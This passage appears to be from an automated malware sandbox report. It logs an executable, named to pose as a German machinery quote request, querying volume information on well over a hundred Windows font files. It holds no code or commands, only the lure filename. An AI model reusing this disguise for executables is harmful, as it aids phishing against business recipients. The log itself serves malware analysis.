          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
